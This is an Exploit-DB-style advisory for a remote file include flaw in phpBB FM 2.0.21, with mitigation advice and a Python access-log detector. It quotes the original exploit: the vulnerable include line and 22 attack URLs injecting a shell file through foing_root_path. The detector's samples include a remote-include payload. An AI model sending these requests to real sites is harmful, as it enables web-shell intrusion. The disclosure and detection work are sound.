Vendor: phpBB FM
By: phpBBFM
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: phpBB FM
Affected Version From: 2.0.21
Affected Version To: 2.0.21
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpbbfm:phpbb_fm:2.0.21
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2002

Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)

This exploit allows an attacker to include a remote file on the vulnerable server. The vulnerable code prepends the foing_root_path variable to $phpbb_root_path and is present in the files faq.php, index.php, list.php, login.php, playlist.php, song.php, gen_m3u.php, view_artist.php, view_song.php, flash/set_na.php, flash/initialise.php, flash/get_song.php, includes/common.php, admin/nav.php, admin/main.php, admin/list_artists.php, admin/index.php, admin/genres.php, admin/edit_artist.php, admin/edit_album.php, admin/config.php, and admin/admin_status.php. The exploit is triggered by sending a specially crafted HTTP request that carries an attacker-supplied value in the foing_root_path parameter.

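Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations. In this case, the value of foing_root_path must not be taken from the HTTP request when the include path is built.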
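
A detection check for the request pattern described above, as an added example that is not part of the original advisory or the Exploit-DB entry: it flags any access-log request that sets `foing_root_path`, which a client never legitimately needs to send. The combined log format, the `/player/` path, the helper names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "foing_root_path"  # parameter named in the advisory
# Request line of a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that leave the local tree: scheme or wrapper prefix, "//", UNC path.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]+:|//|\\\\)', re.I)

def php_name(name):
    """Normalise a query key the way PHP does before creating a variable."""
    base = name.split("[", 1)[0]  # foing_root_path[] becomes an array of that name
    return base.replace(".", "_").replace(" ", "_")  # PHP maps "." and " " to "_"

def classify(line):
    """Return (path, value, kind) if the request sets PARAM, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # parse_qsl percent-decodes keys and values, so %66oing_root_path matches.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if php_name(name) == PARAM:  # PHP variable names are case-sensitive
            kind = "remote" if REMOTE_RE.match(value) else "local"
            return target.path, value, kind
    return None

def scan(lines):
    """Collect a finding for every log line that sets PARAM."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation addresses, hypothetical /player/ path).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Oct/2006:10:00:01 +0000] "GET /player/faq.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Oct/2006:10:00:02 +0000] "GET /player/faq.php'
    '?foing_root_path=http%3A%2F%2Fhost.example%2Fa.txt%3F HTTP/1.1" 200 88',
    '203.0.113.9 - - [23/Oct/2006:10:00:03 +0000] "GET /player/admin/nav.php'
    '?foing.root.path=probe/ HTTP/1.1" 200 64',
    '203.0.113.9 - - [23/Oct/2006:10:00:04 +0000] "GET /player/song.php'
    '?id=4&%66oing_root_path[]=x HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for path, value, kind in scan(SAMPLE_LOG):
        print(f"{kind:6} {path} {PARAM}={value!r}")
```

Access logs record only the query string, so a value sent in a POST body or cookie is not visible to this check.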
Source

Exploit-DB raw data:

##############################################################
Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)

##############################################################

Source Code:
   http://phpbbfm.net/support/index_fm.php
   http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz
###################################################

Vulnerable Code:_
include('includes/common.php');
$phpbb_root_path = $foing_root_path . $phpbb_root_path;
In
./faq.php
./index.php
./list.php
./login.php
./playlist.php
./song.php
./gen_m3u.php
./view_artist.php
./view_song.php
./flash/set_na.php
./flash/initialise.php
./flash/get_song.php
./includes/common.php
./admin/nav.php
./admin/main.php
./admin/list_artists.php
./admin/index.php
./admin/genres.php
./admin/edit_artist.php
./admin/edit_album.php
./admin/config.php
./admin/admin_status.php

###################################################

Exploit :
http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?
###################################################

Discovered By :  020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  > WwW.DwRaT.CoM & WwW.Tryag.CoM & WwW.Xp020.CoM
###################################################

# milw0rm.com [2006-10-23]